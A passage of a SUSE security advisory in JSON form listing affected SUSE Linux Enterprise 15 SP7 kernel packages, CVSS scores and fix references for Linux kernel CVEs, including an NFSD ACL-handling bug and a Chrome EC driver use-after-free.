"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "low"
}
],
"title": "CVE-2025-68802"
},
{
"cve": "CVE-2025-68803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68803"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: NFSv4 file creation neglects setting ACL\n\nAn NFSv4 client that sets an ACL with a named principal during file\ncreation retrieves the ACL afterwards, and finds that it is only a\ndefault ACL (based on the mode bits) and not the ACL that was\nrequested during file creation. This violates RFC 8881 section\n6.4.1.3: \"the ACL attribute is set as given\".\n\nThe issue occurs in nfsd_create_setattr(), which calls\nnfsd_attrs_valid() to determine whether to call nfsd_setattr().\nHowever, nfsd_attrs_valid() checks only for iattr changes and\nsecurity labels, but not POSIX ACLs. When only an ACL is present,\nthe function returns false, nfsd_setattr() is skipped, and the\nPOSIX ACL is never applied to the inode.\n\nSubsequently, when the client retrieves the ACL, the server finds\nno POSIX ACL on the inode and returns one generated from the file\u0027s\nmode bits rather than returning the originally-specified ACL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68803",
"url": "https://www.suse.com/security/cve/CVE-2025-68803"
},
{
"category": "external",
"summary": "SUSE Bug 1256770 for CVE-2025-68803",
"url": "https://bugzilla.suse.com/1256770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68803"
},
{
"cve": "CVE-2025-68804",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68804"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver\n\nAfter unbinding the driver, another kthread `cros_ec_console_log_work`\nis still accessing the device, resulting an UAF and crash.\n\nThe driver doesn\u0027t unregister the EC device in .remove() which should\nshutdown sub-devices synchronously. Fix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
